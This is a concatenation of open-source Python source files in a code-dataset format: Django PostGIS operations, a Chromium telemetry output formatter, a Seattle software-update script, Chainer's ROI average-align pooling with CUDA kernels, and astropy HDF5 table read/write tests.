proj_regex = re.compile(r'(\d+)\.(\d+)\.(\d+)')
proj_ver_str = self.postgis_proj_version()
m = proj_regex.search(proj_ver_str)
if m:
return tuple(map(int, [m.group(1), m.group(2), m.group(3)]))
else:
raise Exception('Could not determine PROJ.4 version from PostGIS.')
def spatial_aggregate_name(self, agg_name):
if agg_name == 'Extent3D':
return self.extent3d
else:
return self.geom_func_prefix + agg_name
# Routines for getting the OGC-compliant models.
def geometry_columns(self):
return PostGISGeometryColumns
def spatial_ref_sys(self):
return PostGISSpatialRefSys
def parse_raster(self, value):
"""Convert a PostGIS HEX String into a dict readable by GDALRaster."""
return from_pgraster(value)
def distance_expr_for_lookup(self, lhs, rhs, **kwargs):
return super().distance_expr_for_lookup(
self._normalize_distance_lookup_arg(lhs),
self._normalize_distance_lookup_arg(rhs),
**kwargs
)
@staticmethod
def _normalize_distance_lookup_arg(arg):
is_raster = (
arg.field.geom_type == 'RASTER'
if hasattr(arg, 'field') else
isinstance(arg, GDALRaster)
)
return ST_Polygon(arg) if is_raster else arg
def get_geometry_converter(self, expression):
read = wkb_r().read
geom_class = expression.output_field.geom_class
def converter(value, expression, connection):
return None if value is None else GEOSGeometryBase(read(value), geom_class)
return converter
def get_area_att_for_field(self, field):
return 'sq_m'
| bsd-3-clause |
FusionSP/android_external_chromium_org | tools/telemetry/telemetry/results/output_formatter.py | 77 | 1116 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class OutputFormatter(object):
"""A formatter for PageTestResults.
An OutputFormatter takes PageTestResults, formats the results
(telemetry.value.Value instances), and output the formatted results
in the given output stream.
Examples of output formatter: CsvOutputFormatter produces results in
CSV format."""
def __init__(self, output_stream):
"""Constructs a new formatter that writes to the output_stream.
Args:
output_stream: The stream to write the formatted output to.
"""
self._output_stream = output_stream
def Format(self, page_test_results):
"""Formats the given PageTestResults into the output stream.
This will be called once at the end of a benchmark.
Args:
page_test_results: A PageTestResults object containing all results
from the current benchmark run.
"""
raise NotImplementedError()
@property
def output_stream(self):
return self._output_stream
| bsd-3-clause |
sburnett/seattle | dist/update_software.py | 2 | 1540 | """
<Program Name>
update_software.py
<Started>
December 1, 2008
<Author>
Carter Butaud
<Purpose>
Populates the folder that the software updater checks with
the latest version of the code.
"""
import sys
import make_base_installers
DEBUG = False
def update(trunk_location, pubkey, privkey, update_dir):
"""
<Purpose>
Populates the update directory (set by a constant) with the
program files from the current repository.
<Arguments>
trunk_location:
The location of the repository's trunk directory, used to
find the program files.
pubkey:
The public key used to generate the metafile.
privkey:
The private key used to generate the metafile.
updatedir:
The directory to put the generated update files in.
<Exceptions>
IOError on bad filepath.
<Side Effects>
None.
<Returns>
None.
"""
# If we're in DEBUG mode, don't use the real update
# directory
if DEBUG:
print "Debug mode..."
update_dir = update_dir + "/test"
make_base_installers.prepare_gen_files(trunk_location, update_dir,
False, pubkey, privkey, False)
def main():
global DEBUG
if len(sys.argv) < 3:
print "usage: python update_software.py trunk/location/ publickey privatekey updatedir [-d]"
elif len(sys.argv) == 6:
if sys.argv[5] == "-d":
DEBUG = True
update(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
if __name__ == "__main__":
main()
| mit |
chainer/chainer | chainer/functions/pooling/roi_average_align_2d.py | 4 | 23553 | # Modified work:
# -----------------------------------------------------------------------------
# Copyright (c) 2018 Preferred Infrastructure, Inc.
# Copyright (c) 2018 Preferred Networks, Inc.
# -----------------------------------------------------------------------------
# Original work:
# -----------------------------------------------------------------------------
# Copyright (c) 2015 by Contributors
# \file roi_pooling.cu
# \brief roi pooling operator
# \author Ross Girshick, Kye-Hyeon Kim, Jian Guo
# \changed to roi_align by Elaine Bao
# \file roi_align.cu
# \roi align operator described in Mask RCNN
# -----------------------------------------------------------------------------
import numbers
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import function
from chainer import utils
from chainer.utils import type_check
def _pair(x):
if isinstance(x, chainer.utils.collections_abc.Iterable):
return x
return x, x
def _get_bounds(p, limit):
if p < -1 or p > limit:
# out of range, so it is empty
return None, None, None
low = int(numpy.floor(p))
if low == limit:
low = low - 1
high = low + 1
if low <= -1:
p = 0
elif high >= limit:
p = limit - 1
return p, low, high
def _get_bilinear_interp_params(y, x, y_low, x_low, y_high, x_high):
ly = y - y_low
lx = x - x_low
hy = y_high - y
hx = x_high - x
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
return w1, w2, w3, w4
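# Hedged worked example (added; the sample point is made up): for
# (y, x) = (2.25, 3.75) on a 5x5 grid the surrounding corners are (2, 3),
# (2, 4), (3, 3) and (3, 4), and the weights are w1 = 0.75 * 0.25,
# w2 = 0.75 * 0.75, w3 = 0.25 * 0.25 and w4 = 0.25 * 0.75, which sum to 1
# as expected for bilinear interpolation.
def _example_bilinear_weights():
    y, y_low, y_high = _get_bounds(2.25, 5)
    x, x_low, x_high = _get_bounds(3.75, 5)
    return _get_bilinear_interp_params(y, x, y_low, x_low, y_high, x_high)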
_GET_BILINEAR_INTERP_KERNEL = '''
__device__
bool get_bounds(
T &p, const int limit, int &low, int &high) {
if (p < -1. || p > limit) {
// empty
return false;
}
low = (int)floor(p);
if (low == limit) {
low = low - 1;
}
high = low + 1;
if (low <= -1) {
p = (T) 0.0;
} else if (high >= limit) {
p = (T) (limit - 1);
}
return true;
}
__device__
void get_bilinear_interp_params(
T y, T x, int y_low, int x_low, int y_high, int x_high,
T &w1, T &w2, T &w3, T &w4) {
T ly = y - y_low;
T lx = x - x_low;
T hy = y_high - y;
T hx = x_high - x;
w1 = hy * hx;
w2 = hy * lx;
w3 = ly * hx;
w4 = ly * lx;
}
'''
class ROIAverageAlign2D(function.Function):
"""ROI average align over a set of 2d planes."""
def __init__(self, outsize, spatial_scale, sampling_ratio=None):
outh, outw = _pair(outsize)
if not (isinstance(outh, numbers.Integral) and outh > 0):
raise TypeError(
'outsize[0] must be positive integer: {}, {}'
.format(type(outh), outh))
if not (isinstance(outw, numbers.Integral) and outw > 0):
raise TypeError(
'outsize[1] must be positive integer: {}, {}'
.format(type(outw), outw))
if isinstance(spatial_scale, numbers.Integral):
spatial_scale = float(spatial_scale)
if not (isinstance(spatial_scale, numbers.Real) and
spatial_scale > 0):
raise TypeError(
'spatial_scale must be a positive float number: {}, {}'
.format(type(spatial_scale), spatial_scale))
sampling_ratio = _pair(sampling_ratio)
if not all((isinstance(s, numbers.Integral) and s >= 1) or
s is None for s in sampling_ratio):
raise TypeError(
'sampling_ratio must be integer >= 1 or a pair of it: {}'
.format(sampling_ratio))
self.outh, self.outw = outh, outw
self.spatial_scale = spatial_scale
self.sampling_ratio = sampling_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, roi_type, roi_index_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 4,
roi_type.dtype == numpy.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 4,
roi_index_type.dtype == numpy.int32,
roi_index_type.ndim == 1,
roi_type.shape[0] == roi_index_type.shape[0],
)
def forward_cpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = numpy.empty((n_rois, channels, self.outh,
self.outw), dtype=bottom_data.dtype)
pooled_width, pooled_height = self.outw, self.outh
spatial_scale = self.spatial_scale
for i in six.moves.range(top_data.size):
pw = i % pooled_width
ph = int(i / pooled_width) % pooled_height
c = int(i / pooled_width / pooled_height) % channels
n = int(i / pooled_width / pooled_height / channels)
roi_batch_ind = int(bottom_roi_indices[n])
roi_start_h = bottom_rois[n, 0] * spatial_scale
roi_start_w = bottom_rois[n, 1] * spatial_scale
roi_end_h = bottom_rois[n, 2] * spatial_scale
roi_end_w = bottom_rois[n, 3] * spatial_scale
roi_height = max(roi_end_h - roi_start_h, 1.)
roi_width = max(roi_end_w - roi_start_w, 1.)
bin_size_h = roi_height / pooled_height
bin_size_w = roi_width / pooled_width
if self.sampling_ratio[0] is None:
roi_bin_grid_h = int(numpy.ceil(roi_height / pooled_height))
else:
roi_bin_grid_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
roi_bin_grid_w = int(numpy.ceil(roi_width / pooled_width))
else:
roi_bin_grid_w = self.sampling_ratio[1]
count = roi_bin_grid_h * roi_bin_grid_w
output_val = 0.
for iy in six.moves.range(roi_bin_grid_h):
y = roi_start_h + ph * bin_size_h + \
(iy + .5) * bin_size_h / roi_bin_grid_h
y, y_low, y_high = _get_bounds(y, height)
if y is None or y_low is None or y_high is None:
continue
for ix in six.moves.range(roi_bin_grid_w):
x = roi_start_w + pw * bin_size_w + \
(ix + .5) * bin_size_w / roi_bin_grid_w
x, x_low, x_high = _get_bounds(x, width)
if x is None or x_low is None or x_high is None:
continue
# bilinear interpolation {{
w1, w2, w3, w4 = _get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high)
if w1 > 0 and y_low >= 0 and x_low >= 0:
v1 = bottom_data[roi_batch_ind, c, y_low, x_low]
output_val += w1 * v1
if w2 > 0 and y_low >= 0 and x_high <= width - 1:
v2 = bottom_data[roi_batch_ind, c, y_low, x_high]
output_val += w2 * v2
if w3 > 0 and y_high <= height - 1 and x_low >= 0:
v3 = bottom_data[roi_batch_ind, c, y_high, x_low]
output_val += w3 * v3
if w4 > 0 and y_high <= height - 1 and x_high <= width - 1:
v4 = bottom_data[roi_batch_ind, c, y_high, x_high]
output_val += w4 * v4
# }}
output_val /= count
top_data[n, c, ph, pw] = output_val
return top_data,
def forward_gpu(self, inputs):
self.retain_inputs((1, 2))
self._bottom_data_shape = inputs[0].shape
bottom_data, bottom_rois, bottom_roi_indices = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = cuda.cupy.empty((n_rois, channels, self.outh,
self.outw), dtype=bottom_data.dtype)
if self.sampling_ratio[0] is None:
sampling_ratio_h = 0
else:
sampling_ratio_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
sampling_ratio_w = 0
else:
sampling_ratio_w = self.sampling_ratio[1]
cuda.elementwise(
'''
raw T bottom_data, T spatial_scale, int32 channels,
int32 height, int32 width, int32 pooled_height, int32 pooled_width,
int32 sampling_ratio_h, int32 sampling_ratio_w,
raw T bottom_rois, raw int32 bottom_roi_indices
''',
'T top_data',
'''
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int n = i / pooled_width / pooled_height / channels;
int roi_batch_ind = bottom_roi_indices[n];
T roi_start_h = bottom_rois[n * 4 + 0] * spatial_scale;
T roi_start_w = bottom_rois[n * 4 + 1] * spatial_scale;
T roi_end_h = bottom_rois[n * 4 + 2] * spatial_scale;
T roi_end_w = bottom_rois[n * 4 + 3] * spatial_scale;
// Force malformed ROIs to be 1x1
T roi_height = max(roi_end_h - roi_start_h, (T)1.);
T roi_width = max(roi_end_w - roi_start_w, (T)1.);
T bin_size_h = static_cast<T>(roi_height)
/ static_cast<T>(pooled_height);
T bin_size_w = static_cast<T>(roi_width)
/ static_cast<T>(pooled_width);
int bottom_data_offset =
(roi_batch_ind * channels + c) * height * width;
// We use roi_bin_grid to sample the grid and mimic integral
int roi_bin_grid_h = (sampling_ratio_h > 0)
? sampling_ratio_h
: ceil(roi_height / pooled_height); // e.g. = 2
int roi_bin_grid_w = (sampling_ratio_w > 0)
? sampling_ratio_w
: ceil(roi_width / pooled_width);
// We do average (integral) pooling inside a bin
T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4
T output_val = 0.;
for (int iy = 0; iy < roi_bin_grid_h; iy++) // e.g. iy = 0, 1
{
T y = roi_start_h + ph * bin_size_h +
static_cast<T>(iy + .5f) * bin_size_h /
static_cast<T>(roi_bin_grid_h); // e.g. 0.5, 1.5
int y_low, y_high;
bool y_ret = get_bounds(y, height, y_low, y_high);
if (!y_ret) continue;
for (int ix = 0; ix < roi_bin_grid_w; ix++) {
T x = roi_start_w + pw * bin_size_w +
static_cast<T>(ix + .5f) * bin_size_w /
static_cast<T>(roi_bin_grid_w);
int x_low, x_high;
bool x_ret = get_bounds(x, width, x_low, x_high);
if (!x_ret) continue;
// bilinear_interpolation_gradient {{
T w1, w2, w3, w4;
get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high, w1, w2, w3, w4);
if (w1 > 0 && y_low >= 0 && x_low >= 0) {
T v1 = bottom_data[
bottom_data_offset + y_low * width + x_low];
output_val += w1 * v1;
}
if (w2 > 0 && y_low >= 0 && x_high <= width - 1) {
T v2 = bottom_data[
bottom_data_offset + y_low * width + x_high];
output_val += w2 * v2;
}
if (w3 > 0 && y_high <= height - 1 && x_low >= 0) {
T v3 = bottom_data[
bottom_data_offset + y_high * width + x_low];
output_val += w3 * v3;
}
if (w4 > 0 && y_high <= height - 1 &&
x_high <= width - 1) {
T v4 = bottom_data[
bottom_data_offset + y_high * width + x_high];
output_val += w4 * v4;
}
// }}
}
}
output_val /= count;
top_data = output_val;
''',
'roi_average_align_2d_fwd',
preamble=_GET_BILINEAR_INTERP_KERNEL,
)(bottom_data, self.spatial_scale, channels, height, width,
self.outh, self.outw, sampling_ratio_h, sampling_ratio_w,
bottom_rois, bottom_roi_indices, top_data)
return top_data,
def backward_cpu(self, inputs, gy):
bottom_rois, bottom_roi_indices = inputs[1:]
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = numpy.zeros(self._bottom_data_shape, gy[0].dtype)
spatial_scale = self.spatial_scale
pooled_height = self.outh
pooled_width = self.outw
top_diff = gy[0]
for i in six.moves.range(top_diff.size):
pw = i % pooled_width
ph = int(i / pooled_width) % pooled_height
c = int(i / pooled_width / pooled_height) % channels
n = int(i / pooled_width / pooled_height / channels)
roi_batch_ind = int(bottom_roi_indices[n])
roi_start_h = bottom_rois[n, 0] * spatial_scale
roi_start_w = bottom_rois[n, 1] * spatial_scale
roi_end_h = bottom_rois[n, 2] * spatial_scale
roi_end_w = bottom_rois[n, 3] * spatial_scale
roi_height = max(roi_end_h - roi_start_h, 1.)
roi_width = max(roi_end_w - roi_start_w, 1.)
bin_size_h = roi_height / pooled_height
bin_size_w = roi_width / pooled_width
top_diff_this_bin = top_diff[n, c, ph, pw]
if self.sampling_ratio[0] is None:
roi_bin_grid_h = int(numpy.ceil(roi_height / pooled_height))
else:
roi_bin_grid_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
roi_bin_grid_w = int(numpy.ceil(roi_width / pooled_width))
else:
roi_bin_grid_w = self.sampling_ratio[1]
count = roi_bin_grid_h * roi_bin_grid_w
for iy in six.moves.range(roi_bin_grid_h):
y = roi_start_h + ph * bin_size_h + \
(iy + .5) * bin_size_h / roi_bin_grid_h
y, y_low, y_high = _get_bounds(y, height)
if y is None or y_low is None or y_high is None:
continue
for ix in six.moves.range(roi_bin_grid_w):
x = roi_start_w + pw * bin_size_w + \
(ix + .5) * bin_size_w / roi_bin_grid_w
x, x_low, x_high = _get_bounds(x, width)
if x is None or x_low is None or x_high is None:
continue
# bilinear_interpolation_gradient {{
w1, w2, w3, w4 = _get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high)
if w1 > 0 and y_low >= 0 and x_low >= 0:
g1 = top_diff_this_bin * w1 / count
bottom_diff[roi_batch_ind, c, y_low, x_low] += g1
if w2 > 0 and y_low >= 0 and x_high <= width - 1:
g2 = top_diff_this_bin * w2 / count
bottom_diff[roi_batch_ind, c, y_low, x_high] += g2
if w3 > 0 and y_high <= height - 1 and x_low >= 0:
g3 = top_diff_this_bin * w3 / count
bottom_diff[roi_batch_ind, c, y_high, x_low] += g3
if w4 > 0 and y_high <= height - 1 and x_high <= width - 1:
g4 = top_diff_this_bin * w4 / count
bottom_diff[roi_batch_ind, c, y_high, x_high] += g4
# }}
return bottom_diff, None, None
def backward_gpu(self, inputs, gy):
utils.nondeterministic('atomicAdd')
bottom_rois, bottom_roi_indices = inputs[1:]
channels, height, width = self._bottom_data_shape[1:]
bottom_diff = cuda.cupy.zeros(self._bottom_data_shape, gy[0].dtype)
if self.sampling_ratio[0] is None:
sampling_ratio_h = 0
else:
sampling_ratio_h = self.sampling_ratio[0]
if self.sampling_ratio[1] is None:
sampling_ratio_w = 0
else:
sampling_ratio_w = self.sampling_ratio[1]
cuda.elementwise(
'''
raw T top_diff,
int32 num_rois, T spatial_scale,
int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width,
int32 sampling_ratio_h, int32 sampling_ratio_w,
raw T bottom_rois, raw int32 bottom_roi_indices
''',
'raw T bottom_diff',
'''
// (n, c, h, w) coords in bottom data
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int n = i / pooled_width / pooled_height / channels;
            // Do not use rounding; this implementation detail is critical
int roi_batch_ind = bottom_roi_indices[n];
T roi_start_h = bottom_rois[n * 4 + 0] * spatial_scale;
T roi_start_w = bottom_rois[n * 4 + 1] * spatial_scale;
T roi_end_h = bottom_rois[n * 4 + 2] * spatial_scale;
T roi_end_w = bottom_rois[n * 4 + 3] * spatial_scale;
// Force malformed ROIs to be 1x1
T roi_width = max(roi_end_w - roi_start_w, (T)1.);
T roi_height = max(roi_end_h - roi_start_h, (T)1.);
T bin_size_h = static_cast<T>(roi_height) /
static_cast<T>(pooled_height);
T bin_size_w = static_cast<T>(roi_width) /
static_cast<T>(pooled_width);
int bottom_diff_offset =
(roi_batch_ind * channels + c) * height * width;
int top_offset = (n * channels + c) * pooled_height * pooled_width;
T top_diff_this_bin =
top_diff[top_offset + ph * pooled_width + pw];
// We use roi_bin_grid to sample the grid and mimic integral
int roi_bin_grid_h = (sampling_ratio_h > 0)
? sampling_ratio_h
: ceil(roi_height / pooled_height); // e.g. = 2
int roi_bin_grid_w = (sampling_ratio_w > 0)
? sampling_ratio_w
: ceil(roi_width / pooled_width);
// We do average (integral) pooling inside a bin
T count = roi_bin_grid_h * roi_bin_grid_w; // e.g. = 4
for (int iy = 0; iy < roi_bin_grid_h; iy++) {
T y = roi_start_h + ph * bin_size_h +
static_cast<T>(iy + .5f) * bin_size_h /
static_cast<T>(roi_bin_grid_h); // e.g. 0.5, 1.5
int y_low, y_high;
bool y_ret = get_bounds(y, height, y_low, y_high);
if (!y_ret) continue;
for (int ix = 0; ix < roi_bin_grid_w; ix++) {
T x = roi_start_w + pw * bin_size_w +
static_cast<T>(ix + .5f) * bin_size_w /
static_cast<T>(roi_bin_grid_w);
int x_low, x_high;
bool x_ret = get_bounds(x, width, x_low, x_high);
if (!x_ret) continue;
// bilinear_interpolation_gradient {{
T w1, w2, w3, w4;
get_bilinear_interp_params(
y, x, y_low, x_low, y_high, x_high, w1, w2, w3, w4);
if (w1 > 0 && y_low >= 0 && x_low >= 0) {
T g1 = top_diff_this_bin * w1 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_low * width + x_low], g1);
}
if (w2 > 0 && y_low >= 0 && x_high <= width - 1) {
T g2 = top_diff_this_bin * w2 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_low * width + x_high], g2);
}
if (w3 > 0 && y_high <= height - 1 && x_low >= 0) {
T g3 = top_diff_this_bin * w3 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_high * width + x_low], g3);
}
if (w4 > 0 && y_high <= height - 1 &&
x_high <= width - 1) {
T g4 = top_diff_this_bin * w4 / count;
atomicAdd(&bottom_diff[
bottom_diff_offset + y_high * width + x_high], g4);
}
// }}
}
}
''',
'roi_average_align_2d_bwd',
preamble=_GET_BILINEAR_INTERP_KERNEL,
)(gy[0], bottom_rois.shape[0],
self.spatial_scale, channels, height, width, self.outh, self.outw,
sampling_ratio_h, sampling_ratio_w, bottom_rois, bottom_roi_indices,
bottom_diff, size=gy[0].size)
return bottom_diff, None, None
def roi_average_align_2d(
x, rois, roi_indices, outsize, spatial_scale, sampling_ratio=None
):
"""Spatial Region of Interest (ROI) average align function.
This function acts similarly to
:func:`~chainer.functions.roi_average_pooling_2d`, but it computes average
of input spatial patch with bilinear interpolation for each channel with
the region of interest.
Args:
x (~chainer.Variable): Input variable. The shape is expected to be
            4 dimensional: ``(n: batch, c: channel, h: height, w: width)``.
rois (~chainer.Variable): Input roi variable. The shape is expected to
be ``(n: data size, 4)``, and each datum is set as below:
``(y_min, x_min, y_max, x_max)``.
roi_indices (~chainer.Variable): Input roi variable. The shape is
expected to be ``(n: data size, )``.
outsize ((int, int) or int): Expected output size after pooled
(height, width). ``outsize=o`` and ``outsize=(o, o)``
are equivalent.
spatial_scale (float): Scale of the roi is resized.
sampling_ratio ((int, int) or int): Sampling step for the alignment.
It must be an integer over :math:`1` or :obj:`None`, and the value
is automatically decided when :obj:`None` is passed. Use of
different ratio in height and width axis is also supported by
passing tuple of int as ``(sampling_ratio_h, sampling_ratio_w)``.
``sampling_ratio=s`` and ``sampling_ratio=(s, s)`` are equivalent.
Returns:
~chainer.Variable: Output variable.
See the original paper proposing ROIAlign:
`Mask R-CNN <https://arxiv.org/abs/1703.06870>`_.
"""
return ROIAverageAlign2D(outsize, spatial_scale, sampling_ratio)(
x, rois, roi_indices)
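# Hedged usage sketch (added; shapes and values are made up): pool a single
# ROI covering the top-left quarter of an 8x8 feature map down to 2x2.
def _example_roi_average_align_2d():
    x = numpy.arange(64, dtype=numpy.float32).reshape(1, 1, 8, 8)
    rois = numpy.array([[0., 0., 4., 4.]], dtype=numpy.float32)  # y_min, x_min, y_max, x_max
    roi_indices = numpy.array([0], dtype=numpy.int32)
    y = roi_average_align_2d(x, rois, roi_indices, outsize=2,
                             spatial_scale=1.0, sampling_ratio=2)
    return y.shape  # (1, 1, 2, 2)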
| mit |
mhvk/astropy | astropy/io/misc/tests/test_hdf5.py | 2 | 31266 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import pytest
import numpy as np
from astropy.table import Table, QTable, NdarrayMixin, Column
from astropy.table.table_helpers import simple_table
from astropy import units as u
from astropy.coordinates import (SkyCoord, Latitude, Longitude, Angle, EarthLocation,
SphericalRepresentation, CartesianRepresentation,
SphericalCosLatDifferential)
from astropy.time import Time, TimeDelta
from astropy.units import allclose as quantity_allclose
from astropy.units.quantity import QuantityInfo
from astropy.utils.exceptions import AstropyUserWarning
from astropy.utils.data import get_pkg_data_filename
from astropy.io.misc.hdf5 import meta_path
from astropy.utils.compat.optional_deps import HAS_H5PY # noqa
if HAS_H5PY:
import h5py
ALL_DTYPES = [np.uint8, np.uint16, np.uint32, np.uint64, np.int8,
np.int16, np.int32, np.int64, np.float32, np.float64,
np.bool_, '|S3']
def _default_values(dtype):
if dtype == np.bool_:
return [0, 1, 1]
elif dtype == '|S3':
return [b'abc', b'def', b'ghi']
else:
return [1, 2, 3]
@pytest.mark.skipif('not HAS_H5PY')
def test_write_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.warns(UserWarning, match="table path was not set via the path= argument"):
t1.write(test_file)
t1 = Table.read(test_file, path='__astropy_table__')
@pytest.mark.skipif('not HAS_H5PY')
def test_write_nopath_nonempty(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='bubu')
with pytest.raises(ValueError) as exc:
t1.write(test_file, append=True)
assert 'table path should always be set via the path=' in exc.value.args[0]
@pytest.mark.skipif('not HAS_H5PY')
def test_read_notable_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
with pytest.raises(ValueError, match='no table found in HDF5 group /'):
Table.read(test_file, path='/', format='hdf5')
@pytest.mark.skipif('not HAS_H5PY')
def test_read_nopath(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path="the_table")
t2 = Table.read(test_file)
assert np.all(t1['a'] == t2['a'])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_nopath_multi_tables(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path="the_table")
t1.write(test_file, path="the_table_but_different", append=True,
overwrite=True)
with pytest.warns(AstropyUserWarning,
match=r"path= was not specified but multiple tables"):
t2 = Table.read(test_file)
assert np.all(t1['a'] == t2['a'])
@pytest.mark.skipif('not HAS_H5PY')
def test_write_invalid_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(ValueError) as exc:
t1.write(test_file, path='test/')
assert exc.value.args[0] == "table path should end with table name, not /"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_invalid_path(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/')
assert exc.value.args[0] == "Path test/ does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_group(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_table(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
f.create_group('test').create_group('path')
with pytest.raises(OSError) as exc:
Table.read(test_file, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_missing_group_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
with pytest.raises(OSError) as exc:
Table.read(f, path='test/path/table')
assert exc.value.args[0] == "Path test/path/table does not exist"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_simple(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_table(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table')
with pytest.raises(OSError) as exc:
t1.write(test_file, path='the_table', append=True)
assert exc.value.args[0] == "Table the_table already exists"
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_memory(tmpdir):
with h5py.File('test', 'w', driver='core', backing_store=False) as output_file:
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(output_file, path='the_table')
t2 = Table.read(output_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
with pytest.raises(OSError) as exc:
t1.write(test_file, path='the_table')
assert exc.value.args[0].startswith("File exists:")
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_overwrite(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table', overwrite=True)
t2 = Table.read(test_file, path='the_table')
assert np.all(t2['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
h5py.File(test_file, 'w').close() # create empty file
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='the_table_1', append=True)
t1.write(test_file, path='the_table_2', append=True)
t2 = Table.read(test_file, path='the_table_1')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(test_file, path='the_table_2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append_groups(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
with h5py.File(test_file, 'w') as f:
f.create_group('test_1')
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='test_1/the_table_1', append=True)
t1.write(test_file, path='test_2/the_table_2', append=True)
t2 = Table.read(test_file, path='test_1/the_table_1')
assert np.all(t2['a'] == [1, 2, 3])
t3 = Table.read(test_file, path='test_2/the_table_2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_write_existing_append_overwrite(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
t1.add_column(Column(name='a', data=[1, 2, 3]))
t1.write(test_file, path='table1')
t1.write(test_file, path='table2', append=True)
t1v2 = Table()
t1v2.add_column(Column(name='a', data=[4, 5, 6]))
with pytest.raises(OSError) as exc:
t1v2.write(test_file, path='table1', append=True)
assert exc.value.args[0] == 'Table table1 already exists'
t1v2.write(test_file, path='table1', append=True, overwrite=True)
t2 = Table.read(test_file, path='table1')
assert np.all(t2['a'] == [4, 5, 6])
t3 = Table.read(test_file, path='table2')
assert np.all(t3['a'] == [1, 2, 3])
@pytest.mark.skipif('not HAS_H5PY')
def test_read_fileobj(tmpdir):
test_file = str(tmpdir.join('test.hdf5'))
t1 = Table()
